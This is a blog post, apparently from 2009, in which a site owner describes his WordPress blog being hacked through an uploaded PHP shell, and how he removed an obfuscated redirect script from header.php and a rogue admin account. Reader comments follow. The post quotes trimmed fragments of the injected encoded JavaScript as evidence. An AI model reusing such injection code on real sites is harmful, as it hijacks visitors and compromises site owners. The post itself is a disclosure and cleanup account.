I just wanted to warn you there seems to be a lot of wordpress blogs being hacked right now and it seems to be the same MO.
Last night I was making a post to my blog. Once I got done, I went to view the post and make sure there were no errors or and everything looked cool.
To my surprise…all was not cool!
My page got redirected to another site!!!
I started jumping around to other pages and the same thing was happening. Each page was getting redirected which means each of my blog visitors were going elsewhere and probably thinking I was causing it. That was not the case. Now I’m getting pissed.
I knew for this to be happening there had to be some kind of redirect script in one of the more common *.php files. If you go to the appearance area there is a link to edit your site files. The more common ones are listed on the right. I check the index.php and the footer.php files but did not see anything out of the ordinary. I then looked at my header.php and found this…
<script language=javascript>document.write(unescape(‘%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E%66%75%6E%63%74%69%6F%6E%20%64%46%28%73%29%7B%76%61%72%20%73%31%3D%75%6E%65%73%63%61%70%65%28%73%2E%73%75%62%73%74%72%28%30%2C%73%2E%6C%65%6E%67%74%68%2D%31%29%29%3B%20%76%61%72%20%74%3D%27%27%3B%66%6F%72%28%69%3Dpx/mpdbujpo%264Ei%264C%261B%268E%261B%264D0tdsjqu%264F1′)</script>
To get more information on what this script does you can always visit this post I found
Wordpress injection attack and “affiliate ping-pong”
Removing this code is just the start…as you will soon see.
So I removed the redirection script and notified my hosting provider of what was going on. Here is the response early this morning…
Hello,
It appears that at some point before your wordpress blog has been upgraded, it had been exploited and a PHP shell script had been uploaded to the account. This PHP shell was then used to modify your site. I have now removed this. Please ensure that all account passwords have been changed (included this wordpress adminsitrator password) and that any and all plugins have been updated to their most recent versions. Please let us know if you have any further questions.
—-
[root@gator550 /home/blyssy/public_html/brianlyssy.com/blog/wp-content/uploads]# find -iname “*.php”
./2009/09/28788.php
It appears the hacker was able to upload this 28788.php file to my wordpress directory. This was the file that generated the code in the header.php file but it also did one other thing…
It created an administrator account on my wordpress blog!
If this has happened to you, you need to log into your cpanel and check out your wordpress database’s. IF you don’t know how to, then I suggest you get a professional.
For those that want to go it alone…once your in your cpanel, you want to go to the databases section and select phpMyAdmin.
This will bring up a new window where you will see your databases listed on the left hand side. If you don’t remember the name associated with the database, then don’t fret you can figure it out pretty quick.
Just pick on one. You will see a list of tables for that database.
You want to look for wp_users and select it. IF the current database your looking at does not have a wp_users, then use the drop down box at the top of the listing to select another database.
You want to look for an entry in the database that should not be there and delete it.
What led me to look there was in the wp-admin “users” area I had seen two admin entries. One was me and the other was someone I did not know.
One of the fields had more code in it like this…
<script LANGUAGE=”JavaScript”>function Decode(){var temp=”",i,c=0,out=”";var str=”46!46!46!32!60!98!32!105!100!61!34!117!115!101!114!95!115!117!112!101!114!11714!105!112!116!34!62!l=str.length;while(c<=str.length-1){while(str.charAt(c)!=’!')temp=temp+str.charAt(c++);c++;out=out+String.fromCharCode(temp);temp=”";}document.write(out);} </script><script LANGUAGE=”JavaScript”> Decode(); </script>
This is not the full code. It has been trimmed down so you get the idea.
Anyway…I could not delete this account through the wp-admin area!
That is why I had to resort to going to the database.
I hope this helps others. I would suggest everyone needs to check their blogs, update their blogs, and change their passwords.
I would so love to punch this asshole! A couple of times!
Tags: hacked, header.php, redirection script, WordPress
Tags: hacked, header.php, redirection script, WordPress
Your story is exactly the same as mine, Wordpress need to get their act together and fix these flaws
я вот что скажу: спасибо.. а82ч
After reading you site, Your site is very useful for me .I bookmarked your site!
Then you know how pissed I was when it happened. I would love to meet the guy who did this face to face.